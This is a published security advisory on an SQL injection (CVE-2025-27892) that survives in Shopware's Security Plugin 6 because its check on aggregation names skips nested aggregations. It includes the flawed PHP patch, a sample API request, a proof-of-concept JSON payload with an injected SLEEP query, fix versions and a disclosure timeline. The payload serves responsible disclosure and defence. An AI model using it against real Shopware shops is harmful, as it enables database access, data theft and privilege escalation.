Shopware Unfixed SQL Injection in Security Plugin 6

Shopware is affected by a known SQL injection in older Shopware versions which is fixed in newer Shopware releases. For customers who can not upgrade the main Shopware version the Shopware AG offers the security plugin which patches known vulnerabilities in old Shopware versions.

Details

• Product: Shopware Security Plugin 6
• Affected Versions: Shopware Security Plugin 6 2.0.10 (Shopware < 6.5.8.13, < 6.6.5.1)
• Fixed Versions: Shopware Security Plugin 6 2.0.11, or Shopware 6.6.5.1 or 6.5.8.13
• Vulnerability Type: SQL injection
• Security Risk: medium
• Vendor URL: https://www.shopware.com
• Vendor Status: fixed version released
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2025-001
• GitHub Advisory URL: https://github.com/shopware/shopware/security/advisories/GHSA-8g35-7rmw-7f59
• Advisory Status: published
• CVE: CVE-2025-27892
• CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27892
• Previous CVEs:
  • CVE-2024-42357 https://github.com/shopware/shopware/security/advisories/GHSA-p6w9-r443-r752
  • CVE-2024-22406 https://github.com/shopware/shopware/security/advisories/GHSA-qmp9-2xwj-m6m9
• Shopware Security Plugin: https://store.shopware.com/en/swag136939272659f/shopware-6-security-plugin.html

Introduction

If a security gap appears, it can quickly be closed and protected with an update. However, not every online shop has the ability to immediately update its own system to a new version. Often, other processes or systems are connected to the shop, which requires a specific plan for an update. With this plugin, we offer a solution to quickly and easily secure your online shop despite these limitations. The Security plugin for Shopware 6 includes security-related fixes that can be applied to your Shopware environment through a straightforward plugin update.

(from vendor’s homepage)

More Details

Shopware prior to version 6.5.8.13 is affected by a SQL injection vulnerability (CVE-2024-22406 and CVE-2024-42357). Shopware provides the Security Plugin which should fix those vulnerabilities retrospectively in older Shopware versions. In the case of this SQL injection vulnerability this fix is incomplete. This leads to the vulnerability still being exploitable in Shopware versions prior to 6.5.8.13 even with the latest Security Plugin for that version installed.

The known vulnerability can be found in the aggregations field. This field gets used for example at the /api/search/order endpoint. A possible search could look like the following:

POST /api/search/order HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Bearer [...]

{
  "filter": [
    {
      "type": "equals",
      "field": "transactions.stateMachineState.technicalName",
      "value": "paid"
    }
  ],
  "aggregations": [
    {
      "type": "histogram",
      "name": "order_sum_bucket",
      "field": "orderDateTime",
      "interval": "day",
      "aggregation": {
        "type": "sum",
        "name": "totalAmount",
        "field": "amountTotal"
      }
    }
  ]
}

While the security plugin patches the vulnerability in the name field of the aggregations object, it does not sanitize the aggregation objects which can be used recursively, as can be seen in the following code snippet of the fix in the security plugin:

class PatchedAggregationParser extends AggregationParser
{
    public function buildAggregations(EntityDefinition $definition, array $payload, Criteria $criteria, SearchRequestException $searchRequestException): void
    {
        parent::buildAggregations($definition, $payload, $criteria, $searchRequestException);

        foreach ($criteria->getAggregations() as $i => $aggregation) {
            if (str_contains($aggregation->getName(), '?') || str_contains($aggregation->getName(), ':')) {
                $searchRequestException->add(new InvalidAggregationQueryException('Invalid aggregation name'), '/aggregations/' . $i);
            }
        }
    }

}

The foreach loop only checks the topmost name field of the aggregations. This leads to attackers beeing able to inject symbols like ? or : in the name field of the nested aggregation object, that are normaly reserved for prepared statements.

Proof of Concept

Attacker can exploit this by inserting ? into the mentioned field. Additionally the value field of the filter object gets used as a variable that is bound to the prepared statement. This value can than be used to inject arbitrary SQL statements. An example payload could look like the following:

{
  "filter": [
    {
      "type": "equals",
      "field": "transactions.stateMachineState.technicalName",
      "value": "paid` FROM `order`; SELECT SLEEP(5); --"
    }
  ],
  "aggregations": [
    {
      "type": "histogram",
      "name": "order_sum_bucket",
      "field": "orderDateTime",
      "interval": "day",
      "aggregation": {
        "type": "sum",
        "name": "totalAmount ? ? --",
        "field": "amountTotal"
      }
    }
  ]
}

Fix

An update to Shopware version 6.5.8.13 fixes the vulnerability independently of the security plugin. For older versions, apply update 2.0.11 for the Shopware Security Plugin 6.

Security Risk

Attackers with access to the Shopware Store API or Admin API are able to use an SQL injection vulnerability in order to access the database with read and write permissions. This access can be used to disclose information or escalate privileges.

The risk varies depending on which users have access to the Shopware APIs. If attackers have access to a user in the Shopware backend, even those with low priviliges, attackers could escalate their privileges and compromise the database, which is rated as a medium risk. If the search-related endpoints of the Store API are exposed this vulnerability poses a high risk, as any user with access could exploit the vulnerability to compromise the database.

Timeline

• 2025-02-12 Vulnerability identified
• 2025-02-17 Customer approved disclosure to vendor
• 2025-02-17 CVE ID requested
• 2025-02-24 Vendor notified
• 2025-03-07 Vendor asked for review of fix
• 2025-03-10 Approved the fix
• 2025-03-21 Asked vendor for update
• 2025-04-07 Asked vendor for update
• 2025-04-08 Vendor published advisory and fix
• 2025-04-08 Advisory published

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/